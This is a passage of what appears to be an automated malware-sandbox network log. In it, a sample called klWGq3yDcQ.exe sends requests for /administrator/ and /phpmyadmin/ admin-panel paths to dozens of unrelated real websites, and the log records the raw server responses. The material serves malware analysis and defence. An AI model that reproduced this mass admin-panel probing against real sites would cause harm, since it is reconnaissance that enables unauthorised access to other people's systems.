                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                    CF-RAY: 82bfe7e48f4c060f-IAD
                                                                                                                                                                                                    Data Raw: 35 33 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: 53<script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.648571968 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.650980949 CET379OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: tradeavenida.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: _cfuvid=IQ6.fXY1gWOcS0XXP8NWpKFrL_Du5qZaKZaXERo9oLg-1700978371562-0-604800000
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://tradeavenida.com/administrator/
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.934133053 CET398INHTTP/1.1 409 Conflict
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:31 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    CF-Cache-Status: MISS
                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                    CF-RAY: 82bfe7e70983060f-IAD
                                                                                                                                                                                                    Data Raw: 35 33 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: 53<script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.934190989 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    58192.168.2.455569104.21.63.202806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.252684116 CET228OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: leeberg.dk
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    59192.168.2.455723185.230.63.186806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.302181959 CET250OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: 2brosandahosepressurewashing.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.467055082 CET892INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:31 GMT
                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    location: https://www.2brospw.com/administrator
                                                                                                                                                                                                    strict-transport-security: max-age=3600
                                                                                                                                                                                                    x-wix-request-id: 1700978371.3431035811854118713
                                                                                                                                                                                                    Age: 0
                                                                                                                                                                                                    Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42
                                                                                                                                                                                                    X-Seen-By: VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLkiHzpTYSDRA7u88Ic3Fde4MbwluI1yUDJty9McxOlfY,2d58ifebGbosy5xc+FRalvRpe5d38PZj52JWesmXQd0TlBmTvyXQ1kNDkNgw8duAwconR3pYYaaMJd+wjDqajw==,2UNV7KOq4oGjA5+PKsX47JzIq9ZmP05BQuFbD4KFyTFYgeUJqUXtid+86vZww+nL,WyqNozw2Xgx3ikDivcwNJxYyidTrj7yKAMUEpWCfPK4=,tICdi8CZHCrm4MTs+7a5wtKEvpgNikhb4gXYjLnzCAg=,znHLAI6vxugFKypFMbJjoknx1PdtDhbYJcxyHSEYuIQYDu5ogDwgDHoKLtj+8ynmq7MAIBpTqNY3jZoGLwigEw==
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.787142038 CET307OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: 2brosandahosepressurewashing.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.2brospw.com/administrator
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.932760954 CET902INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    location: https://www.2brospw.com/administrator/index.php
                                                                                                                                                                                                    strict-transport-security: max-age=3600
                                                                                                                                                                                                    x-wix-request-id: 1700978372.8251035811854218713
                                                                                                                                                                                                    Age: 0
                                                                                                                                                                                                    Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42
                                                                                                                                                                                                    X-Seen-By: VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLkiHzpTYSDRA7u88Ic3Fde4MbwluI1yUDJty9McxOlfY,2d58ifebGbosy5xc+FRalvRpe5d38PZj52JWesmXQd0TlBmTvyXQ1kNDkNgw8duAwconR3pYYaaMJd+wjDqajw==,2UNV7KOq4oGjA5+PKsX47PIHZG7rU4AwWR8fGXl1XwJYgeUJqUXtid+86vZww+nL,dLjSAOnmr1bXQEypprkoCxERGcPkj6D+/nuJQUiypu4=,KWKVLcH06BSVHBU4yeQ12bMSxNw/CTILSKCpF1mrPZQ=,znHLAI6vxugFKypFMbJjog+iPrwMgRA+grqxwY82aOS7ToYUcIEHdkpKKWHX1KtJNY7SLVVQv0TXn1MtuyNR+g==
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    X-Content-Type-Options: nosniff


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    60192.168.2.45557234.208.26.152806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.390847921 CET234OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: micro-design.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.726258039 CET453INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:31 GMT
                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                    X-Powered-By: PHP/7.4.15
                                                                                                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                    X-Redirect-By: WordPress
                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                    Location: https://micro-design.com/administrator/
                                                                                                                                                                                                    Cache-Control: s-maxage=10
                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    61192.168.2.455725162.241.62.220806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.391825914 CET236OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: lumaruniformes.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.657351971 CET280INHTTP/1.1 409 Conflict
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:31 GMT
                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                    Content-Length: 83
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                    Data Ascii: <script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.657999039 CET296OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: lumaruniformes.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://lumaruniformes.com/administrator/


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    62192.168.2.455665185.54.192.125806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.391829967 CET231OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: talentius.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.564223051 CET594INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:31 GMT
                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                    Location: https://talentius.com/administrator/
                                                                                                                                                                                                    Content-Length: 323
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 61 6c 65 6e 74 69 75 73 2e 63 6f 6d 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 61 6c 65 6e 74 69 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://talentius.com/administrator/">here</a>.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at talentius.com Port 80</address></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                    63192.168.2.45559635.214.252.24780
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.391829014 CET238OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: locandafrancigena.it
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.575455904 CET611INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:31 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                    SG-Captcha: challenge
                                                                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                    Cache-Control: no-store,no-cache,max-age=0
                                                                                                                                                                                                    Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                                                                                                                    X-Proxy-Cache-Info: DT:1
                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                    Data Raw: 61 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 25 8e cb 0e c2 20 14 44 7f 85 90 e8 ae 3c b4 91 be a8 3b ff 83 d0 ab 90 52 5a e9 ad 8d 7f 2f ea 62 32 99 cc 24 67 3a 87 53 e8 3b 07 66 e8 bb e0 e3 48 12 04 4d bd 9d 23 25 2e c1 5d d3 c1 a0 69 5a da 77 13 a0 21 0e 71 29 e0 b9 f9 97 a6 b9 4e b0 3a 4a f2 1a 21 a2 a6 a2 e5 6c 87 10 8a 31 ce 7b e4 eb c3 9a 05 ad 33 fc 9a f4 e1 74 33 c3 e4 a3 5f 31 19 9c 53 ce c7 b7 be 6f b6 a9 6a 26 cb ac 8a 5d 44 23 95 10 b5 aa ce 4a b2 52 c9 8c e5 5f 6e b6 ff 47 fe 3b fc 01 c4 da 2a c2 b7 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: ab% D<;RZ/b2$g:S;fHM#%.]iZw!q)N:J!l1{3t3_1Soj&]D#JR_nG;*0
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.576962948 CET300OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: locandafrancigena.it
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://locandafrancigena.it/administrator/
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.759979963 CET617INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:31 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                    SG-Captcha: challenge
                                                                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                    Cache-Control: no-store,no-cache,max-age=0
                                                                                                                                                                                                    Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                                                                                                                    X-Proxy-Cache-Info: DT:1
                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                    Data Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 25 8e cb 0e c2 20 14 44 7f 85 90 e8 ae d0 fa e8 13 ea ce ff 20 70 15 52 4a 2b bd b5 fa f7 a2 2e 26 93 c9 4c 32 47 58 1c 7d 2f 2c 28 d3 0b ef c2 40 22 78 49 9d 9e 02 25 36 c2 4d 52 a3 50 b5 1d ed c5 08 a8 88 45 9c 33 78 ac ee 29 69 aa 23 2c 96 92 b4 46 08 28 69 de 71 b6 81 f7 d9 10 a6 2d f0 e5 ae d5 8c da 2a 7e 89 72 77 b8 2a 33 ba e0 16 8c 0a a7 98 b2 0b 06 5e 6c b6 f3 fe 2d 6f ab 6e eb 86 15 a7 a4 9a 95 79 5b 54 79 de 54 f5 b1 2a 58 79 2e d3 3f ff 02 24 fb c3 f2 1f f9 07 00 88 d2 29 c0 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: b1% D pRJ+.&L2GX}/,(@"xI%6MRPE3x)i#,F(iq-*~rw*3^l-ony[TyT*Xy.?$)0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    64192.168.2.45564081.169.145.74806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.392080069 CET236OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: awb-apparatebau.de
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.591197968 CET409INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:31 GMT
                                                                                                                                                                                                    Server: Apache/2.4.58 (Unix)
                                                                                                                                                                                                    Content-Length: 196
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.596812010 CET296OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: awb-apparatebau.de
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://awb-apparatebau.de/administrator/
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.793929100 CET409INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:31 GMT
                                                                                                                                                                                                    Server: Apache/2.4.58 (Unix)
                                                                                                                                                                                                    Content-Length: 196
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    65192.168.2.455664194.47.252.115806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.392272949 CET229OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: maxiv.lu.se
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.588054895 CET157INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    content-length: 0
                                                                                                                                                                                                    location: https://www.maxiv.lu.se/administrator/


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    66192.168.2.45586223.185.0.1806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.392283916 CET225OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: avient.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.518424034 CET623INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Content-Length: 162
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Location: https://avient.com/phpmyadmin/
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    X-Pantheon-Styx-Hostname: styx-fe1-a-7c9c446c8c-bdjmn
                                                                                                                                                                                                    X-Styx-Req-Id: 56bb24ea-8b6e-11ee-89c5-1a890f82dc29
                                                                                                                                                                                                    Cache-Control: public, max-age=86400
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:31 GMT
                                                                                                                                                                                                    X-Served-By: cache-chi-kigq8000168-CHI, cache-lga21920-LGA
                                                                                                                                                                                                    X-Cache: HIT, MISS
                                                                                                                                                                                                    X-Cache-Hits: 1, 0
                                                                                                                                                                                                    X-Timer: S1700978371.434056,VS0,VE25
                                                                                                                                                                                                    Vary: Cookie, Cookie
                                                                                                                                                                                                    Age: 76720
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.518435955 CET216INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31
                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    67192.168.2.45563981.169.145.157806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.392283916 CET229OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: kappablu.de
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.594032049 CET409INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:31 GMT
                                                                                                                                                                                                    Server: Apache/2.4.58 (Unix)
                                                                                                                                                                                                    Content-Length: 196
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.597258091 CET282OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: kappablu.de
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://kappablu.de/administrator/
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.797049999 CET409INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:31 GMT
                                                                                                                                                                                                    Server: Apache/2.4.58 (Unix)
                                                                                                                                                                                                    Content-Length: 196
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
